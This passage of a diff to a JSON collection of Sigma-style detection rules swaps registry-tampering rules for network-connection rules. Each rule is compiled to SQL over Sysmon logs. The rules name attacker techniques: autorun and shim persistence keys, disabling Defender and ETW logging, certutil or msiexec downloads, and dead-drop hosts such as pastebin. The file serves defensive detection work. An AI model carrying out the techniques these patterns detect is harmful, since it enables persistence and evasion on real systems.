'%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_new_network_provider.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion" ], @@ -32559,4350 +32605,4326 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unknown" + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "id": "480421f9-417f-4d3b-9552-fd2728443ec8", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((Details LIKE '(Empty)' ESCAPE '\\' OR Details LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "RDP Sensitive Settings Changed to Zero", - "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", - "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_terminal_server_suspicious.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Wow6432Node Classes Autorun Keys Modification", - "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", + "status": "experimental", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", - "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "title": "Wuauclt Network Connection", + "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of wuauclt.exe over the network." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_wuauclt_network_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Session Manager Autorun Keys Modification", - "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "title": "Msiexec Initiated Connection", + "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate msiexec over networks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" + "filename": "net_connection_win_msiexec.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", - "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "title": "Suspicious Non-Browser Network Communication With Reddit API", + "id": "d7b09985-95a3-44be-8450-b6eadf49833e", + "status": "experimental", + "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", + "author": "Gavin Knapp", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.command_and_control", + "attack.t1102" ], "falsepositives": [ - "Unknown" + "Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND DestinationHostname LIKE '%reddit.com%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "net_connection_win_reddit_api_non_browser_access.yml" }, { - "title": "Potential Persistence Via Shim Database Modification", - "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "title": "Python Initiated Connection", + "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "status": "experimental", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.011" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Legitimate python script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (Details = ''))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND Image LIKE '%python%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" ], - "filename": "registry_set_persistence_shim_databases.yml" + "filename": "net_connection_win_python.yml" }, { - "title": "Disable Exploit Guard Network Protection on Windows Defender", - "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "title": "Script Initiated Connection", + "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "status": "experimental", - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 